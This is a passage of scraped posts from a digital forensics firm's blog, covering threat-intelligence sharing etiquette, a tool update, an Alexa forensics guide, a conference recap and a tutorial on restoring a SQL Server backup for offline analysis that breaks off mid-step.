<span id="gmail-docs-internal-guid-835d113e-985a-4719-5d36-41e41f8b5890"><span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">Hello again readers and welcome back! The topic of today's blog post is something that we posted on a few years back, but unfortunately it’s worth repeating. Companies (both large and small) who provide any kind of cyber security services have a responsibility to anyone they interact with to be completely transparent, particularly when words like “breach”, “victim”, and “target” start getting thrown around. Case in point: an email that a client received from a large, well-established cyber security services company a few weeks ago caused a bit of internal alarm, yet ultimately did not contain enough information to be actionable.</span></span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large; white-space: pre-wrap;">In short, sharing information, threat intelligence, tactics/techniques/procedures (TTPs), indicators of compromise (IOCs), etc. is something that ALL of us in the industry need to do better. I applaud the sharing of IOCs and threat information (when it’s unclassified, obviously). If this particular email had simply contained that information in a timely manner, I would have applauded the initiative. Unfortunately, the information sharing of a seven month old phish consisted of: </span></div>
<span id="gmail-docs-internal-guid-835d113e-985a-4719-5d36-41e41f8b5890"><span style="font-family: "arial" , "helvetica" , sans-serif;">
<span style="font-size: large;"><br /></span></span></span><br />
<ul><span id="gmail-docs-internal-guid-835d113e-985a-4719-5d36-41e41f8b5890">
<li style="color: #222222;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">four domains</span></li>
<li style="color: #222222;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">tentative attribution to Kazakhstan, but zero supporting evidence</span></li>
<li style="color: #222222;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">“new” (but, admittedly, unanalyzed) malware, including an MD5 hash, and of course, </span></li>
<li style="color: #222222;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">a sales pitch</span></li>
</span></ul>
<span id="gmail-docs-internal-guid-835d113e-985a-4719-5d36-41e41f8b5890">
</span>
<div dir="ltr" style="color: #222222; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span id="gmail-docs-internal-guid-835d113e-985a-4719-5d36-41e41f8b5890"><span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span></span></span></div>
<span id="gmail-docs-internal-guid-835d113e-985a-4719-5d36-41e41f8b5890">
<div dir="ltr" style="color: #222222; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;">The recipient of this email attempted to find out more information, but was ultimately put off by the tone and was unsure whether the information was valid or just a thinly veiled sales pitch. They reached out to us directly for assistance.</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span></div>
</span><div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<div style="color: #222222;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><span style="color: black; vertical-align: baseline; white-space: pre-wrap;">I passed this particular information on to others within the information security field, and recently </span><a href="https://www.arbornetworks.com/blog/asert/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" style="color: #1155cc; text-decoration-line: none;"><span style="color: blue; vertical-align: baseline; white-space: pre-wrap;">Arbor Networks actually put out a much more comprehensive overview of this activity</span></a><span style="color: black; vertical-align: baseline; white-space: pre-wrap;">, with a whole bunch of indicators and information that was not included, or even alluded to, in this particular email. I wish that more companies would take the initiative and do research into actors and campaigns such as this. If I were a CIO looking for a particular indicator from an email, and in searching for more information I came across the information in the Arbor post, I would be much more inclined to engage with Arbor if I or my team needed external resources than I would with the sender of an email that may have had good intentions, but felt like a services fishing expedition.</span></span></div>
<div style="color: #222222;">
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif; font-size: large; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<div style="color: #222222;">
<span style="color: black; font-family: "arial" , "helvetica" , sans-serif; font-size: large; vertical-align: baseline; white-space: pre-wrap;"><br /></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large; vertical-align: baseline; white-space: pre-wrap;">On the exact opposite end of the spectrum, <a href="https://medium.com/@djhoulihan/no-panera-bread-doesnt-take-security-seriously-bf078027f815" rel="nofollow" target="_blank"><span style="color: blue;">the outreach of the recent Panera data loss was done perfectly.</span></a> </span><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large; white-space: pre-wrap;">In the original email, the individual attempted to contact the proper security individuals, had no luck initially, was very disappointed by the initial response from Panera, and tried repeatedly to work with the team. The team at Panera pretty much did nothing until they went public with the issue just a few days ago, which (finally) spurred Panera to react, albeit in a less than satisfactory fashion, again. To be 100% honest, if I were in that situation I would have done everything exactly the same way. It is a sad state of affairs when we as customers/consumers are more concerned with companies protecting our own information, than the companies who are charged with the care of that information for their services/loyalty programs/etc. </span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span><div dir="ltr" style="color: #222222; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><br class="gmail-kix-line-break" /></span><span style="color: black; vertical-align: baseline; white-space: pre-wrap;">Additionally, no one wants to hear that their company or team has security issues, but responsible disclosure methods are always the way to go. However, it is hard for companies and individuals who are trying to do the right thing to highlight and address issues when “fishing for work” is so pervasive. I’ve seen many companies blow off security notifications as scams and ignore them completely, due precisely to this pervasive problem of fishing for work. </span></span></div>
<div dir="ltr" style="color: #222222; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"> </span></span></div>
<div dir="ltr" style="color: #222222; line-height: 1.38; margin: 0pt 11pt; text-align: center;">
<span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><img height="341" src="https://lh6.googleusercontent.com/u4HJWP4u8YW5DpxOxLB_DHqk4f_V9uwrdNFtxY46AgcWpgG9O_x5RY5nMGoic57votQS-CSVjdBANV3-1vh_kMf9EfDdrjNRawDZXXL6xrWDgkbUTLEYasMzsiyYu92KGwUwxdxn" style="border: none; transform: rotate(0rad);" width="427" /></span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><br /></span><div dir="ltr" style="color: #222222; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; font-size: large;"><span style="color: black; vertical-align: baseline; white-space: pre-wrap;">So ideally, how can we share information better?</span><span style="color: black; vertical-align: baseline; white-space: pre-wrap;"><br class="gmail-kix-line-break" /></span></span></div>
<span style="font-family: inherit; font-size: large;"><ol>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Join information sharing programs and network (Twitter, LinkedIn, conferences, etc.)</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Don’t “cold call” unless you have no other option. The process works much better when you already have a relationship (or know someone who does)</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Share complete, useful, and actionable information: recognize that not all companies can search the same way, due to limitations in resources available and even policy, regulations, and even privacy laws. Some companies cannot search by email, while others will need traditional IOCs (IPs, domains, hashes (not just MD5 hashes, also include SHA1 and SHA256 if you can)). </span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Include the body of the phishing email and the complete headers--if the company is unable to search for the IOCs, they may be able to determine that it was likely blocked by their security stack </span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Be timely. Sharing scant details of a phish from seven months ago goes well beyond the capabilities threshold of most companies </span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">Be selective in how and to whom you share. Sending these “helpful” notifications to C-levels is guaranteed to bring the infosec department to a full stop while they work on only this specific threat, whether real, imagined, or incorrect. Which brings me to #7….</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="white-space: pre;"><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Make sure (</span><span style="font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">absolutely sure</span><span style="font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) you are correct. “Helpful notifications” that are based on incorrect information and lack of technical expertise are common enough that a large company could have days of downtime dedicated to them. (</span><span style="font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">And if the client themselves points out your technical errors with factual observations, consider the possibility that you might be wrong, apologize profusely, and DO NOT keep calling every day</span></span><span style="vertical-align: baseline; white-space: pre-wrap;">)</span></span></li>
</ol>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="white-space: pre-wrap;"><br /></span></span></div>
</span>
</span></div>
Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com1tag:blogger.com,1999:blog-1547389155659419533.post-81871887657246801972018-01-30T10:47:00.002-05:002018-01-30T11:06:25.630-05:00Several minor updates to buatapa!<br />
<span style="font-size: large;">Hello again readers and welcome back! I am pleased to announce that today there is a brand new, updated version of buatapa! Over the past several months I've had requests for better in script feedback on some of the ways that buatapa processed the results of autoruns, but just have not had the free time to sit down and try to work on implementing them. The new version is a little more "wordy", as it tries the best that it can to help the user if there are processing problems. For example, if you did not run autoruns with the needed flags, buatapa will recognize that from the output file you are running and suggest you run it again. For those on Mac (and maybe a few *nix systems), it also tells you if you do not have the proper permissions to access the autoruns output file.<br /><br /><br />There are also some slight changes to the interior processing and a little better logic flow. All in all, buatapa has held up quite well since the early testing nearly three years ago, and hopefully is a useful tool in helping to try to triage Windows systems within your environment.<br /><br /><br /><br />If you have any questions or encounter any bugs/issues, please do not hesitate to reach out!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">buatapa_0_0_7.zip - <a href="https://www.brimorlabs.com/Tools/Scripts/Python/buatapa_0_0_7.zip" target="_blank">download here</a> </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">MD5: 8c2f9dc33094b3c5635bd0d61dbeb979</span><br />
<span style="font-size: large;">SHA-256: c1f67387484d7187a8c40171d0c819d4c520cb8c4f7173fc1bba304400846162</span><br />
<span style="font-size: large;">Version 0.0.7</span><br />
<span style="font-size: large;">Updated: January 30, 2018</span>Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-83635257232751669832017-12-26T16:13:00.002-05:002017-12-26T16:13:40.270-05:00Amazon Alexa Forensic Walkthrough Guide<br />
<span style="font-size: large;">Hello again readers and welcome back! We are working on wrapping up 2017 here at BriMor Labs, as this was a very productive and busy year. One of the things that <a href="https://twitter.com/b1n2h3x" target="_blank">Jessica</a> and <a href="https://twitter.com/brianjmoran" target="_blank">I</a> have been meaning to put together for quite some time was a small document summarizing the URLs to query from Amazon to return some of the Amazon Echosystem data.<br /><br />After several months, we (cough cough Jessica) finally was able to get the time to put it together and share it with all of you. We hope that it is helpful during your investigations and analysis, and if you need anything else please do not hesitate to reach out to Jessica or myself!</span><br />
<br />
<br />
<span style="font-size: large;"><a href="https://brimorlabs.box.com/v/AlexaCloudDataReferenceGuide" target="_blank">Alexa Cloud Data Reference Guide</a></span><br />
<br />
<br />
<br />
<br />Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com0tag:blogger.com,1999:blog-1547389155659419533.post-6480377769933892012017-06-26T12:53:00.001-04:002017-06-26T12:53:56.697-04:00A Brief Recap of the SANS DFIR Summit<br />
<span style="font-size: large;">Hello again readers and welcome back!! I had the pleasure of attending (and speaking at, more on that in a bit!) at the 10th SANS DFIR Summit this past week. It is one conference that I always try to attend, as it always has a fantastic lineup of DFIR professionals speaking about amazing research and experiences that they have had. This year was, of course, no exception, as the two day event was filled with incredible talks. The full lineup of slides from the talks <a href="https://www.sans.org/summit-archives/file/summit-archive-1498230402.pdf" target="_blank">can be found here</a>. This was also the first year that the presenters had "walk-up music" before the talks.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">This year, my good friend <a href="https://twitter.com/B1N2H3X" target="_blank">Jessica Hyde</a> and I gave a presentation on the Amazon "Echo-system" in a talk we titled "<a href="https://www.sans.org/summit-archives/file/summit-archive-1498230402.pdf" target="_blank">Alexa, are you Skynet</a>". We even brought a slight cosplay element to the talk as I dressed up in a Terminator shirt and Jessica went full Sarah Connor! One other quick note about our talk that I would like to add, is we chose the song "<a href="https://dualcoremusic.bandcamp.com/track/all-the-things" target="_blank">All The Things</a>" by <a href="http://dualcoremusic.com/nerdcore/" target="_blank">Dual Core</a> as our walk-up music. Dual Core actually lives in Austin and fortunately his schedule allowed him to attend our talk. It was really cool having the actual artist who performed our walk-up music be in attendance at our talk!</span><br />
<span style="font-size: large;"><br /></span>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5udmCQtP8YlU4bkZQ9hZVeeIvjKn03Gh5-D6Owsd7XxIPgHEOEnPRAqNW_QUwHM9z5QfW4g9nc4x7BO0Kd0f4Ss3iKTerNV_Qnt7sNZCZ9gQCQwchmAKDhwi0ag8BS1a4kqPGTuyJ_KI_/s1600/alexa-talk.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="900" data-original-width="1600" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5udmCQtP8YlU4bkZQ9hZVeeIvjKn03Gh5-D6Owsd7XxIPgHEOEnPRAqNW_QUwHM9z5QfW4g9nc4x7BO0Kd0f4Ss3iKTerNV_Qnt7sNZCZ9gQCQwchmAKDhwi0ag8BS1a4kqPGTuyJ_KI_/s640/alexa-talk.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Jessica and I speaking about the Amazon Echo-system at the 2017 SANS DFIR Summit</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">We admittedly had a LOT of slides and a LOT of material to cover, but if you have attended any of our presentations in the past, the reason our slide decks tend to be long is that we want to make sure that the slides themselves can still paint a pretty good picture of what we talked about. This way, even if you were not fortunate enough to see our presentation, the you can follow along and the slides and they can also serve as reference points during future examinations. We received a lot of really great comments about our talk and had some fantastic conversations afterwards as well, so hopefully if you attended you enjoyed it!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">My other favorite part of the DFIR Summit is getting to see colleagues and friends that you interact with throughout</span><span style="font-size: large;"> the year, actually in person and not just as a message box in a chat window! Even though some of us live fairly close to each other in the greater Baltimore/DC area, we fly 1500 miles every summer to hang out for a few days. While in Austin several of us had some discussions about trying to start some local meetup type events on a more regular basis, so there definitely will be more on that to follow in the coming weeks! </span><br />
<span style="font-size: large;"><br /></span>
<br />Brian Moranhttp://www.blogger.com/profile/10916463151597324052noreply@blogger.com2tag:blogger.com,1999:blog-1547389155659419533.post-4555527097178241682017-03-09T10:11:00.002-05:002017-06-03T16:45:53.220-04:00How to load a SQL .bak file for analysis, without SQL Server previously installed<br />
<span style="font-size: large;">Hello again readers and welcome back! I hope that this new year has been treating you well so far! I recently worked a case with an interesting twist that I never had to deal with before, so I figured I would make a blog post about it and share my experiences. I also wanted to document the whole process just in case I have to deal with it again!</span><br />
<br />
<br />
<span style="font-size: large;">The case that I worked involved a SQL Server backup file (with a ".bak" file extension), which was created from a Microsoft SQL Server instance. Loading and parsing a SQL Server backup file is fairly trivial if you have a SQL Server environment, but I do not have a SQL Server environment and had to come up with a way to be able to process the data. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><u>Edited March 10, 2017 </u>- The reddit user <a href="https://www.reddit.com/user/fozzie33" target="_blank">fozzie33</a> made a fantastic point that I did not specify in this particular post. I was working from a copy of the data that was originally provided, but it is best to change the attributed to read-only in an effort to ensure the raw data itself does not change. In any forensic investigation you should always be working from a copy of the data and never the original, but changing the attributes to read-only is another step one should take to limit any changes to the data, even if it is a working copy!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">I followed a total of nine steps to accomplish analysis of the backed up SQL database:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">1) Download SQL Server 2016 SP1 Developer edition</span><br />
<span style="font-size: large;">2) Download Microsoft SQL Server Management Studio</span><br />
<span style="font-size: large;">3) Copy executables to flash drive</span><br />
<span style="font-size: large;">4) Copy executables to offline system</span><br />
<span style="font-size: large;">5) Install SQL Server</span><br />
<span style="font-size: large;">6) Install SSMS</span><br />
<span style="font-size: large;">7) Launch SSMS & restore the SQL database</span><br />
<span style="font-size: large;">8) Make your SQL queries using SSMS</span><br />
<span style="font-size: large;">9) Great success! High five!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><b>Step 1: Download SQL Server 2016 SP1 Developer edition </b></span><a href="https://msdn.microsoft.com/library/dd206988.aspx">https://msdn.microsoft.com/library/dd206988.aspx</a><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">Hopefully you have a Microsoft Developer Network account, if not, pop over to the MSDN page and sign up for one, it is free and quite easy to do. Once you are logged in, you can download the SQL Server 2016 SP1 Developer edition. The reason for using this version, compared to the Express version, is that the Express version limits the size of your database to 10GB. If you know your database is going to be smaller than that, you can definitely use the Express version, but I prefer the Developer edition just to be sure I can handle the database regardless of what size the database will be. </span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">IMPORTANT NOTE: The license of the Developer edition explicitly prohibits using "Production data". While the backup file is indeed "Production data", I recommend installing the needed items and processing all of the data on a completely offline machine, and when you are finished with the analysis completely uninstall everything from your system. My personal take on the EULA is that Microsoft does not want you to use the Developer edition to power an online database backend, as they of course want you to purchase the license to allow you to do that. My opinion is that performing offline analysis of a SQL Server backup file is well within the limitations of the Developer license, but if you have any question on the legality of the issue please consult proper legal counsel, as I am not a lawyer nor did I stay at a Holiday Inn Express last night!</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">To download the files for your offline machine, first choose the "</span><span style="font-size: large;">SQL Server 2016 Developer Edition Download" option. </span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWV52xR3xUk0xQ6OSeLEYKOX55UzrKTsY4rVuv9cVODKvhpAzX8GdVtY4Oxbcs6RHzIcYCKQbiCuZkPY5c2utPFbFP6bRcCPjB6OyaLdBBfqiDpxTFA84lHntpbTvm3J7RgCPyDac1ybcm/s1600/Choose+Developer+Edition+Download.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="350" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWV52xR3xUk0xQ6OSeLEYKOX55UzrKTsY4rVuv9cVODKvhpAzX8GdVtY4Oxbcs6RHzIcYCKQbiCuZkPY5c2utPFbFP6bRcCPjB6OyaLdBBfqiDpxTFA84lHntpbTvm3J7RgCPyDac1ybcm/s640/Choose+Developer+Edition+Download.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: small;"><i>Choose the "SQL Server 2016 Developer Edition Download" option</i></span></td></tr>
</tbody></table>
<br />
<span style="font-size: large;">The download page will load, then choose the "SQL Server 2016 Developer with Service Pack 1" option.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHsiVf12ycGvFgCBR5I3Jra_FH9MLCjRLk1bYY-ri1-bunw8KJi0nzYcl4idOD6QO9RE22FEYHTeXgpt2eFnZ2pCTkLmzgjbQJeZI8NhMg0MHYmxI78XnzyJGek2Azifl9tgMDX3wapzuO/s1600/Download+SQL+Server+2016.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHsiVf12ycGvFgCBR5I3Jra_FH9MLCjRLk1bYY-ri1-bunw8KJi0nzYcl4idOD6QO9RE22FEYHTeXgpt2eFnZ2pCTkLmzgjbQJeZI8NhMg0MHYmxI78XnzyJGek2Azifl9tgMDX3wapzuO/s640/Download+SQL+Server+2016.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose the "SQL Server 2016 Developer with Service Pack 1" option</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">You will be presented with an option to download the .iso, or you can use the "Click here to utilize the SQL installer." option which will download a file with a name like "SQLServer2016-SSEI-Dev.exe</span><span style="font-size: large;">". This installer will let you download the files so you can install it all to your offline machine.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlyTsdE58WBWGXvT1VcBI2iF-V58pQzpZuN-lgTMialo_Vm4wAvOIG6wBs-XwrrjJ4EqZvW5F8g4ZUhyphenhyphentDMe09F0Sm6Vx9iLeCY0gFktUVIGFYOFzOc45m0KQBrtu0yb7xxJsdztLsqbuw/s1600/Use+SQL+Installer.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlyTsdE58WBWGXvT1VcBI2iF-V58pQzpZuN-lgTMialo_Vm4wAvOIG6wBs-XwrrjJ4EqZvW5F8g4ZUhyphenhyphentDMe09F0Sm6Vx9iLeCY0gFktUVIGFYOFzOc45m0KQBrtu0yb7xxJsdztLsqbuw/s640/Use+SQL+Installer.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose "Click here to utilize the SQL installer." option</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH2meGBwO9pTDuNgF1fWVdH8yyXb1IvG6_dP0cyOFqmuF7vdPEzqfjq2bPWxkarv8xqc_zXgSzJ0HXfFhK1TH94wTZc46AbnzLqHrvHQ6QICNESfKXXPTkBk4_6aG8GRepyYKuknJwQuYz/s1600/SQLServer2016-SSEI-Dev.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH2meGBwO9pTDuNgF1fWVdH8yyXb1IvG6_dP0cyOFqmuF7vdPEzqfjq2bPWxkarv8xqc_zXgSzJ0HXfFhK1TH94wTZc46AbnzLqHrvHQ6QICNESfKXXPTkBk4_6aG8GRepyYKuknJwQuYz/s640/SQLServer2016-SSEI-Dev.jpg" width="512" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">The file "SQLServer2016-SSEI-Dev.exe" was downloaded</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">When you run the program, you will be presented with a screen containing three options. We are going to select the "Download Media" option, as we want to install it on another machine.</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSF77OSppWdKvSfr8NYMRyVDWl2pSNfn8WYT5ucOTS8Ig8rpf7NX9XVKxZXhjvRvqQH52kqL0r39sylPh6d9mXFan-acDR4MokVWXD1V3j7FJUiisDmO3JRslUz96Wu-uR26iTFb4SmtVJ/s1600/SQLInstallationType.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="506" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSF77OSppWdKvSfr8NYMRyVDWl2pSNfn8WYT5ucOTS8Ig8rpf7NX9XVKxZXhjvRvqQH52kqL0r39sylPh6d9mXFan-acDR4MokVWXD1V3j7FJUiisDmO3JRslUz96Wu-uR26iTFb4SmtVJ/s640/SQLInstallationType.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choosing the "Download Media" option</span></i></td></tr>
</tbody></table>
<span style="font-size: large;">On the next screen we will be presented with the option to download the ISO or the CAB. We want the CAB option as it will be easier to install on another Windows machine, so choose the "CAB" option and save it to the download path of your liking, then click the "Download" button.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhic8ALXfO7p-ZYr2-ad64RNtjtX_c1nysqt0rzOixb9GGHSXYG-AHJcZJyIfOz1BhaLdS5gMf-93EC7b4vr34olxjllFoL5Dvl0SA579-1P5VaOvcwf0f8qYx7y5OBod-fUCn8uSrK-9pj/s1600/Choosecab.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="506" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhic8ALXfO7p-ZYr2-ad64RNtjtX_c1nysqt0rzOixb9GGHSXYG-AHJcZJyIfOz1BhaLdS5gMf-93EC7b4vr34olxjllFoL5Dvl0SA579-1P5VaOvcwf0f8qYx7y5OBod-fUCn8uSrK-9pj/s640/Choosecab.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Choose "CAB" option</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">The download will take a few seconds (or minutes, depending on your ISP) and there will be a friendly new screen informing you that the download is finished upon completion.</span><br />
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0lLUYgjsf8XkQYrkRzYhCpQhsZXpNuzSq_ijHQcpbfXZ3z6SUX0GVt2cj6wUMTMfAv9kXY4p2GvOmRngjrShHYX2tfO0nodY7wonTjJzCxsbP6poBlxcf8YYPO2A_vkE2imU4C0qHxv55/s1600/DownloadComplete.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="506" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0lLUYgjsf8XkQYrkRzYhCpQhsZXpNuzSq_ijHQcpbfXZ3z6SUX0GVt2cj6wUMTMfAv9kXY4p2GvOmRngjrShHYX2tfO0nodY7wonTjJzCxsbP6poBlxcf8YYPO2A_vkE2imU4C0qHxv55/s640/DownloadComplete.jpg" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><i><span style="font-size: small;">Congratulations, the download is now complete!</span></i></td></tr>
</tbody></table>
<span style="font-size: large;"><br /></span>
<span style="font-size: large;">When the download is complete, you should have the files "SQLServer2016-DEV-x64-ENU.box" and "</span><span style="font-size: large;">SQLServer2016-DEV-x64-ENU.exe" saved in your directory:</span><br />
<span style="font-size: large;"><br /></span>
<span style="font-size: large;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
